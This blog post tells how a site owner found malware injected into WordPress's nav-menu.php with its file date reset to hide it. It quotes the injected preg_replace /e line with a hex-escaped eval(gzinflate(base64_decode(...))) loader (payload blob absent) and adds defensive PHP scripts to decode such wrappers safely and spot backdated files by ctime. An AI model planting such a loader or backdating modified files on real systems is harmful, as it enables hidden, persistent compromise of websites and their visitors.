I recently received an email from my web host, notifying me that a few files on a couple of different websites had malicious code in them.
This was actually the second time I received an email about files on these websites. I had already gone through them a few days previously, hunting through various directories in FTP and manually deleting or cleaning all the files I found that had recent dates.
Bah!
So I did it again … logged in via FTP, deleted the files they mentioned, went through a few directories with files sorted by date, and deleted a bunch more malicious files that my host hadn't detected.
Yet I suspected there was at least one more file lurking around somewhere.
So! I asked my programmer friend to put together a script that could display a list of all files on a website and sort them by date.
Lo and behold! A few interesting things happened.
First, here's a file that had malicious code injected.
Notice anything weird about it?
Me neither!
The file has the same date, time and permissions as all the others around it. This is how I missed it the first time — simply sorting a list of files in this directory by “Last modified” did NOT in fact show the file's actual date!
But, my friend's script showed a different story.
In this list, nav-menu.php is the newest file on the entire website.
OK! So we've got a bot that injects malicious code into a file, saves it, and then resets the file's modification time (mtime) to match its neighbours. That mtime is exactly what the FTP "Last modified" column shows, and any process that can write the file can set it to any value (PHP's touch() does it in one call), so sorting by date in an FTP client cannot be trusted to reveal the change.
What does it inject, exactly?
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B",".");//iend
You can copy/paste the above into this decoder to make it readable. Use a decoder that swaps eval() for echo (or performs the base64 and inflate steps itself); never paste the line into a live PHP interpreter, because the whole point of the wrapper is to execute whatever is inside the blob.
On every site I checked, the injected code was identical, always on line 465, and always in /wp-includes/nav-menu.php. The /e modifier is what makes the line dangerous: it tells preg_replace() to evaluate the replacement string as PHP, so the hex-escaped eval(gzinflate(base64_decode(...))) runs on every request that loads nav-menu.php. That modifier was deprecated in PHP 5.5 and removed in PHP 7.0, where the call only emits a warning and returns NULL, but the file has been tampered with either way and should be replaced with a clean copy.
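The hex string in the injected line spells out eval(gzinflate(base64_decode('...'))); and the blob inside is compressed PHP. The script below is an added example, not code from the post or from the decoder it links to: it unwraps that construction without executing anything, by undoing the hex escapes, then running the base64 and inflate steps itself and printing the recovered source. The injected line it works on is constructed here for the demo, with a harmless echo as the payload rather than the real blob quoted above.

```php
<?php
// Added example, not code from the post: unwrap an injected
// preg_replace("/.*/e", "\x65\x76...", ".") line without executing it.
// The /e modifier makes preg_replace() eval() the replacement string, which
// after hex-unescaping reads eval(gzinflate(base64_decode('...'))); this
// decoder does the base64 and inflate steps itself and prints the source
// instead of evaluating it. The injected line below is constructed for the
// demo with a harmless echo as its payload, not the blob from the post.

// Turn "\x65\x76..." escapes into the characters they stand for.
function unescapeHex(string $s): string
{
    return preg_replace_callback('/\\\\x([0-9A-Fa-f]{2})/', function (array $m) {
        return chr(hexdec($m[1]));
    }, $s);
}

// Peel eval(gzinflate(base64_decode('...'))); wrappers one layer per turn
// until the remaining code no longer matches. Returns every layer found,
// outermost first; the last element is the real payload.
function unwrapLayers(string $code, int $maxDepth = 10): array
{
    $pattern = '~eval\(gzinflate\(base64_decode\(\'([A-Za-z0-9+/=]+)\'\)\)\);~';
    $layers = [];
    for ($i = 0; $i < $maxDepth; $i++) {
        if (!preg_match($pattern, $code, $m)) {
            break;
        }
        $raw = base64_decode($m[1], true);            // strict mode rejects junk
        $inner = ($raw === false) ? false : @gzinflate($raw);
        if ($inner === false) {
            break;                                   // corrupt, or not really deflate
        }
        $layers[] = $inner;
        $code = $inner;                              // check for a nested wrapper
    }
    return $layers;
}

// --- constructed sample, same shape as the line quoted in the post ---
$wrap = function (string $src): string {
    return "eval(gzinflate(base64_decode('" . base64_encode(gzdeflate($src)) . "')));";
};
$demoSource = "echo 'demo payload, constructed for this example';";
// Two nested layers, as samples in the wild often have; the outer blob then
// goes into the hex-escaped wrapper exactly as in the post.
$blob = base64_encode(gzdeflate($wrap($demoSource)));
$escaped = '\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28'
         . '\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\''
         . $blob . '\'\x29\x29\x29\x3B';
$injectedLine = 'preg_replace("/.*/e","' . $escaped . '",".");//iend';

$readable = unescapeHex($injectedLine);
echo "Wrapper after hex-unescaping:\n", $readable, "\n\n";
foreach (unwrapLayers($readable) as $depth => $src) {
    echo "Layer ", $depth + 1, ":\n", $src, "\n\n";
}
```

Run it locally with php from the command line, never on the web host. To analyse a real sample, replace the constructed line with the one copied from the infected file; the loop keeps peeling as long as each decoded layer is itself another eval(gzinflate(base64_decode(...))) wrapper, which is common, and stops at the first layer that is plain code or that fails strict base64 or inflate checks.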
If you suspect your website may have been hacked, simply download this script, upload it into the root directory of your website, and view it in a browser. (Be sure to delete the script immediately after viewing the report.)
If nav-menu.php shows a different date in this list than in your FTP program, it has probably been tampered with. A date check catches this particular trick, but the conclusive test is comparing the file against the pristine copy from the same WordPress release (WP-CLI's wp core verify-checksums does that for every core file), and replacing wp-includes wholesale from a fresh download is the quickest way to be sure nothing else is hiding there.
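The reason a listing can show a different date than the FTP client is that a file carries more than one timestamp. The mtime is what FTP shows and what the bot reset; the inode change time (ctime) is set by the kernel whenever the file's content or metadata changes, an unprivileged process cannot backdate it, and even the touch() used to reset the mtime bumps the ctime to the current time. The script below is an added example written for this post, not the friend's script (which is not shown here and may work differently): it walks the web root, sorts by ctime so the real newest file comes first, and flags any file whose mtime is more than a day older than its ctime. The one-day threshold is an assumption chosen for the demo, and it assumes a POSIX-style host (on Windows, PHP reports the creation time as the ctime).

```php
<?php
// Added example, not the script from the post (which is not shown there).
// Lists every file under the web root with two timestamps:
//   mtime - "last modified", what an FTP listing shows; any process that can
//           write the file can also rewrite it (PHP: touch($file, $anyTime)).
//   ctime - inode change time, set by the kernel whenever content or metadata
//           changes; an unprivileged process cannot backdate it, and even the
//           touch() used to reset mtime bumps ctime to "now".
// Sorting by ctime therefore surfaces the real newest file, and a file whose
// mtime is far older than its ctime had its date reset after being written.
// Assumptions: POSIX-style host (on Windows PHP reports creation time as
// ctime) and a one-day gap as the flagging threshold. Delete this file from
// the server as soon as you have read the report.

const TIMESTOMP_GAP_SECONDS = 86400;   // hypothetical threshold, tune to taste

function scanTree(string $root): array
{
    $rows = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $info) {
        if (!$info->isFile()) {
            continue;
        }
        $mtime = $info->getMTime();
        $ctime = $info->getCTime();
        $rows[] = [
            'path'    => substr($info->getPathname(), strlen($root) + 1),
            'mtime'   => $mtime,
            'ctime'   => $ctime,
            'stomped' => ($ctime - $mtime) > TIMESTOMP_GAP_SECONDS,
        ];
    }
    // Newest real change first: order on ctime, never on the spoofable mtime.
    usort($rows, function (array $a, array $b) {
        return $b['ctime'] <=> $a['ctime'];
    });
    return $rows;
}

function renderReport(array $rows): string
{
    $out = sprintf("%-19s  %-19s  %-7s  %s\n", 'ctime (real)', 'mtime (FTP)', 'flag', 'path');
    foreach ($rows as $r) {
        $out .= sprintf(
            "%s  %s  %-7s  %s\n",
            date('Y-m-d H:i:s', $r['ctime']),
            date('Y-m-d H:i:s', $r['mtime']),
            $r['stomped'] ? 'STOMPED' : '',
            $r['path']
        );
    }
    return $out;
}

if (PHP_SAPI !== 'cli') {
    header('Content-Type: text/plain; charset=utf-8');
}
echo renderReport(scanTree(__DIR__));
```

Upload it to the web root, open it once in a browser, and delete it. Read the report with two caveats in mind. First, files unpacked from a zip or restored from a backup keep their old mtime and get a fresh ctime, so an entire fresh install will show up as STOMPED with one shared ctime; the signal to look for is a lone file whose ctime is newer than all of its neighbours, which is exactly what nav-menu.php showed here. Second, an attacker with root on the host can forge ctime as well, so a clean report is reassurance, not proof, and the checksum comparison against a pristine WordPress release remains the definitive check.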
Other Malicious Files Found
The script turned out to be handy in helping me delete a bunch of other malicious files that also weren't detected by my host.
This highlighted file, for example, appears to be the oldest in the directory — which MUST mean it's the safest, right? There's no way I'd have a malicious file that's been sitting there for 2 years, right?
Once again, the script showed a different date (it was the newest on the whole website):
Other baddies my host didn't find, that had suspicious modified dates:
While today was more or less a write-off, going through all the websites I host with the same fine-toothed comb, tonight I'll rest a little bit better knowing the world is a safer place.
Download
So, what are you waiting for? Find those evil lurking files on your website now! Download the script here. I've got 3 other file-viewing scripts available for download here as well.
Disclaimer
For obvious reasons, I recommend deleting these scripts from your server as soon as you use them.
I certainly can't be held responsible for anyone who creates a list of all files and directories on their entire website … and leaves it open to the public.
Enjoy!
rob
Awesome. I'll check this out.